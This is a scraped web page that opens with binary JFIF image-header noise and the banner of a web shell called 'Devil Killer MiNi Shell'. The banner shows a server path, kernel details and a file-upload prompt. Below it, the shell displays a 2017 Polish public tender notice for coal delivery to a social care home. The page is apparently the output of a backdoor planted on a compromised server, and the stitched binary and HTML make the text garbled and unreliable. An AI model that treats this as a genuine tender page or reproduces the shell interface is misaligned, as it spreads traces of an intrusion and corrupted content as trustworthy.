JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170207/21054-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.dps.strzelceop.pl' target='_blank'>http://www.bip.dps.strzelceop.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 21054 - 2017
              z dnia 2017-02-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Strzelce Opolskie: Sukcesywna  dostawa  węgla  orzech  gat. I i eko-groszku  dla  Domu  Pomocy  Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w  Leśnicy  ul. Strażacka 8.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej w Strzelcach Opolskich z Filią w Szymiszowie i Filią w Leśnicy, krajowy numer identyfikacyjny
              31049100000, ul.
              ul. Strażacka 
              8,
              47100  
              Strzelce Opolskie, woj.
              opolskie, państwo
              Polska, tel.
              774 613 480, e-mail
              dps.strzelceopolskie@wp.pl, faks
              774 613 480.
              <br />
              Adres strony internetowej (URL): www.bip.dps.strzelceop.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dps.strzelceop.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dps.strzelceop.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty w formie papierowej w sposób opisany w SIWZ<br />
                Adres:
                <br />Dom Pomocy Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w Lesnicy ul. Strażacka 8, 47-100 Strzelce Op. </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywna  dostawa  węgla  orzech  gat. I i eko-groszku  dla  Domu  Pomocy  Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w  Leśnicy  ul. Strażacka 8.<br /><b>Numer referencyjny: </b>DPS.361.ZP.83.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem  zamówienia  jest  sukcesywna  dostawa  węgla  orzech  gat. I  i  eko-groszku   dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie   i  filią 
w  Leśnicy  ul. Strażacka  8.  
Zamawiający  dopuszcza  składanie  ofert  częściowych,  obejmujących  jedną  lub  dwie  części  zadania.  Wykonawca  może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia. 
Zamówienie  składa  się  z  dwóch  części:
I  część  -  zadanie  pod  nazwą:  Sukcesywna  dostawa  węgla  orzech  gat. I  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy
ul. Strażacka  8.  
II  część   -  zadanie  pod  nazwą:  Sukcesywna  dostawa  eko-groszku  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy
ul. Strażacka  8.  
                                              
Część  I  - Węgiel  orzech  gat. I   -  w  ilości  190t  -  Załącznik  nr  2  (dostawa do  DPS  Filia  Szymiszów  ul. Strzelecka   2)
Parametry:
               -  typ  31.1  lub  31.2  lub  32.1
               -  granulacja  węgla  40-120mm,
-  wartość  opałowa  powyżej  29.000kJ/kg
-  zawartość  popiołu  do  7%
-  zawartość  siarki  do  0,8%
               -  wilgotność  mniejsza  niż  6%
  
Część  II:  węgiel  kamienny  eko-groszek  płukany  w  ilości  150t  -  Załącznik  nr  3   (dostawa  do  DPS  Filia  Leśnica  ul. Szpitalna  20)
 Parametry:
              -      wartość  opałowa  powyżej  26 000kJ/kg 
-	granulacja  węgla  5-25 mm
-	niskie  pęcznienie  (węgiel  nie  zlepia  się  w  czasie  spalania)
-	zawartość  siarki  do  0,6%,
-	zawartość  popiołu  do  7,0%,
-	wilgotność  mniejsza  niż  10%,
               -     typ  31.1  lub  31.2  lub  32.1
               -     zawartość  miału  do  5% (granulacja  ziarna  poniżej  4mm).

3.1. Realizacja  zamówienia  będzie  następować  zgodnie  z  zasadami  dla  części  I: Wykonawca  zobowiązuje  się  dostarczyć  asortyment  umowy  własnym   
transportem  do  Filii DPS w Szymiszowie, ul.  Strzelecka  2 (  samochodami  o  dowolnym  tonażu )  w  ilości  odpowiednio  podanej  w  załączniku  nr  2  w  dniach  roboczych  (od  poniedziałku  do  soboty)  w  godzinach  od  7 00 -14 00 na    zasadach:
a)  asortyment  zamawianej  dostawy  będzie  uzgadniany  sukcesywnie  telefonicznie, faxem    
lub  drogą  elektroniczną  co najmniej  na  trzy  dni  robocze  przed  dostawą,
b)  palacz  zmianowy  obecny  przy  odbiorze  przedmiotu  zamówienia 
(wyrywkowe   sprawdzenie  ilości  i  pobieranie  próbek  do  jakości  opału),  
c) węgiel  składowany  jest  w  piwnicy- kotłowni  zamawiającego,  
d)  wykonawca  zapewnia  dobrą  jakość  opału,  
e)  zamawiający  zastrzega  sobie możliwość wyrywkowego  sprawdzenia  wagi 
dostarczonego opału,  dojazd  i  koszt  ważenia  do niezależnego  punktu  wagowego  na  koszt  wykonawcy,
f)  DPS  posiada  prawo  do  kontroli  jakości  realizowanych  dostaw  zgodnie
z parametrami  określonymi  w  pkt. 3  SIWZ  poprzez:  zażądanie  od  Wykonawcy   badań  przeprowadzonych  przez  podmiot  posiadający  stosowne  akredytacje,  bądź  oddać  próbkę  do  badań  przez  podmiot  posiadający  stosowne  akredytacje, 
g)  DPS  ma  prawo  do  weryfikacji  badań  przedłożonych  przez  Wykonawcę,  
o  których  mowa  w  pkt. 3 f  ,  dostarczonych  przez  Wykonawcę  -  przy czym  próbka   ta  do  badań  przeprowadzanych  na  zlecenie  Wykonawcy,  jak i  DPS  -  pobierana   będzie  z  dostawy  przy  obecności  obu  stron  lub  wyznaczonych przedstawicieli,
h)  każde  z  badań  węgla  gat. I   wykonywane  jest  na  koszt  wykonawcy,   
i)  w  przypadku,  gdy  badania  o  których  mowa  pkt.  f  i  g  potwierdzą ,  iż  dostawa  została  dokonana  z  naruszeniem  postanowień  pkt. 3  SIWZ   Wykonawca  zobowiązany  jest  wg  wyboru  DPS:
i. 1  zabrać z  piwnicy  kotłowni  dokonaną  dostawę  obarczoną  wadą  i  dostarczyć  właściwą  dostawę  o takiej  samej  ilości,  spełniająca  wymogi  określone  w  pkt. 3  SIWZ  lub
 i. 2 obniżyć  cenę  tej części  dostawy, w  której  wadę  wykryto o 20%  oferowanej      
 ceny.     
 j)   dostarczenie  certyfikatów  na  adres  DPS  nie  później  niż  w  ciągu  7  dni  po  
 każdej  dostawie  opału,    
 k)   fakturowanie  odbywać  się będzie po  każdorazowej  dostawie,
 l)  wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie 
 obowiązywania  umowy,
 ł)   zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości.
m)Dom Pomocy Społecznej jest  wymieniony  w  katalogu  zwolnień  z  podatku  akcyzowego  -  jako  podmiot  wymieniony  wprost  w  art. 6 ust. 5 ustawy  o  pomocy  społecznej.

 3.2 Realizacja  zamówienia  będzie  następować  zgodnie  z  zasadami  dla  części  II: 
Wykonawca  zobowiązuje  się  dostarczyć  asortyment  umowy  własnym   
transportem  do  Filii DPS w  Leśnicy, ul.  Szpitalna  20 (  samochodami  o  tonażu  nie  przekraczającym  8t  bez  przyczep  i  naczep)  w  ilości  odpowiednio  podanej  w  załączniku  nr  3  w  dniach  roboczych  (od  poniedziałku  do  soboty)  w  godzinach  od  7 00 -14 00 na    zasadach:
a)  asortyment  zamawianej  dostawy  będzie  uzgadniany  sukcesywnie  telefonicznie, faxem    
lub  drogą  elektroniczną  co najmniej  na  dwa  dni  przed  dostawą,
b)  palacz  zmianowy  obecny  przy  odbiorze  przedmiotu  zamówienia (wyrywkowe   sprawdzenie  ilości  i  pobieranie  próbek  do  jakości  opału),  
c) węgiel  składowany  jest w  piwnicy  -  kotłowni  zamawiającego,
d)  wykonawca  zapewnia  dobrą  jakość  opału,  
e)  zamawiający  zastrzega  sobie możliwość wyrywkowego  sprawdzenia  wagi  dostarczonego opału,  dojazd  i  koszt  ważenia  do niezależnego  punktu  wagowego    
na  koszt  wykonawcy,
f)  DPS  posiada  prawo  do  kontroli  jakości  realizowanych  dostaw  zgodnie  z parametrami  określonymi  w  pkt. 3  SIWZ  poprzez:  zażądanie  od  Wykonawcy   badań  przeprowadzonych  przez  podmiot  posiadający  stosowne  akredytacje,  bądź  oddać  próbkę  do  badań  przez  podmiot  posiadający stosowne  akredytacje, 
g)  DPS  ma  prawo  do  weryfikacji  badań  przedłożonych  przez  Wykonawcę,  
o  których  mowa  w  pkt. 3 f  ,  dostarczonych  przez  Wykonawcę  -  przy czym  próbka  ta    do  badań  przeprowadzanych  na  zlecenie  Wykonawcy,  jak i  DPS  - pobierana   będzie  
z  dostawy  przy  obecności  obu  stron  lub  wyznaczonych  przedstawicieli,
h)  każde  z  badań  eko-groszku  wykonywane  jest  na  koszt  wykonawcy,   
i)  w  przypadku,  gdy  badania  o  których  mowa  pkt.  f  i  g  potwierdzą ,   iż  dostawa  została  dokonana  z  naruszeniem  postanowień  pkt. 3  SIWZ  Wykonawca  zobowiązany  jest  wg  wyboru  DPS:
i. 1  zabrać  z  piwnicy  kotłowni  dokonaną  dostawę  obarczoną  wadą  i  dostarczyć  właściwą  dostawę  o takiej samej  ilości,  spełniająca  wymogi  określone  w  pkt. 3  SIWZ  lub
i. 2  obniżyć  cenę  tej  części  dostawy,  w  której  wadę  wykryto  o  20%  oferowanej      
ceny.     
j)  dostarczenie  certyfikatów  na  adres  DPS  nie  później  niż  w  ciągu  7  dni  po  każdej  dostawie  opału,    
k)  fakturowanie  odbywać  się będzie po  każdorazowej  dostawie,
l)  wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie 
obowiązywania  umowy,
ł)  zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości.
m)Dom Pomocy Społecznej jest  wymieniony  w  katalogu  zwolnień  z  podatku  akcyzowego  -  jako  podmiot  wymieniony  wprost  w  art. 6 ust. 5 ustawy  o  pomocy  społecznej.

Zgodnie z  załącznikiem  nr  2  i  nr   3. 
<br /><br /><b>II.5) Główny kod CPV: </b>09111000-0<br /><b> Dodatkowe kody CPV:</b>24311800-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 18/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający  nie  stawia  wymagań  w  tym  zakresie. Warunek  zostanie spełniony poprzez złożenie oświadczenia o spełnieniu  warunków  udziału.<br />
                Informacje dodatkowe
                Zamawiający  nie  stawia  wymagań  w  tym  zakresie. Warunek  zostanie spełniony poprzez złożenie oświadczenia o spełnieniu  warunków  udziału.<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający  nie  stawia  wymagań  w  tym  zakresie. Warunek  zostanie spełniony poprzez złożenie oświadczenia o spełnieniu  warunków  udziału.<br />
                Informacje dodatkowe
                Zamawiający  nie  stawia  wymagań  w  tym  zakresie. Warunek  zostanie spełniony poprzez złożenie oświadczenia o spełnieniu  warunków  udziału.<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający  nie  stawia  wymagań  w  tym  zakresie. Warunek  zostanie spełniony poprzez złożenie oświadczenia o spełnieniu  warunków  udziału.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.aktualny  odpis  z  właściwego  rejestru  lub  z  centralnej  ewidencji  i  informacji  o  działalności  gospodarczej,   jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  ewidencji,   w  celu  wykazania  braku  podstaw  do  wykluczenia  na  podstawie  art.  24  ust.  5  pkt.  1  ustawy  -  załącznik  nr 6 ,
Jeżeli  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium  Rzeczypospolitej  Polskiej,  zamiast  dokumentów  o  których  mowa  w  pkt. 7.4 SIWZ 
składa  dokument  lub  dokumenty  wystawione  w  kraju,  w  którym  ma  siedzibę  lub  miejsce  zamieszkania,  potwierdzające  odpowiednio,  że  nie  otwarto  jego  likwidacji  ani  nie  ogłoszono  upadłości.
2.zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  potwierdzającego,  że  wykonawca  nie  zalega  z  opłacaniem  podatków,  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert  załącznik  nr   7,
3.zaświadczenia  właściwej  terenowej  jednostki  organizacyjnej  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego  albo  innego  dokumentu  potwierdzającego,  że wykonawca  nie  zalega  z  opłacaniem  składek  na  ubezpieczenie  społeczne  lub  zdrowotne,  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert  załącznik  nr  8.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. wypełniony  druk  oferty  wg  załączonego  wzoru  OFERTA - załącznik  nr  1, 2. formularz  cenowy  na  dostawę  węgla  orzech  gat. I   załącznik  nr  2, 
3. formularz  cenowy  na  dostawę  węgla  eko-groszku   załącznik  nr  3, 4. 
Wykonawca  - zgodnie  z  art.  24  ust.  11 ustawy  prawo  zamówień  publicznych  w  terminie  3  dni  od  dnia  przekazania  informacji,  o  której  mowa  w  art.  86  ust.  5  ustawy  prawo  zamówień  publicznych  (informacji wskazanych w rozdziale  5  pkt.8 SIWZ)  przekazuje  Zamawiającemu  oświadczenie  o  przynależności  lub  braku  przynależności  do  tej  samej  grupy  kapitałowej,  o  której  mowa  w  art.  24  ust. 1  pkt. 23 ustawy  prawo  zamówień  publicznych  załącznik  nr  9  do  SIWZ.  Wraz  ze  złożeniem  w.w oświadczenia,  Wykonawca  może  przedstawić  dowody,  że  powiązania  z  innym  wykonawcą  nie  prowadzą  do  zakłócenia  konkurencji  w  postępowaniu  o  udzielenie  zamówienia,  5.W  przypadku, gdy  ofertę  podpisują  osoby,  których  upoważnienie do  reprezentacji  nie 
wynika  z  dokumentów  rejestrowych  załączonych  do  oferty,  wymaga  się,  aby Wykonawca  dołączył  do  oferty  oryginał  pełnomocnictwa  do  podpisania  oferty,6.
 Informacje  zawarte  w  ofercie,  stanowiące  tajemnicę  przedsiębiorstwa  w  rozumieniu       
przepisów  o  zwalczaniu  nieuczciwej  konkurencji  muszą  być  oznaczone  klauzulą: 
 Dokument  stanowi  tajemnicę  przedsiębiorstwa  w  rozumieniu  ustawy  o  zwalczaniu     
 nieuczciwej  konkurencji  i  wydzielone  w  formie  załącznika.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
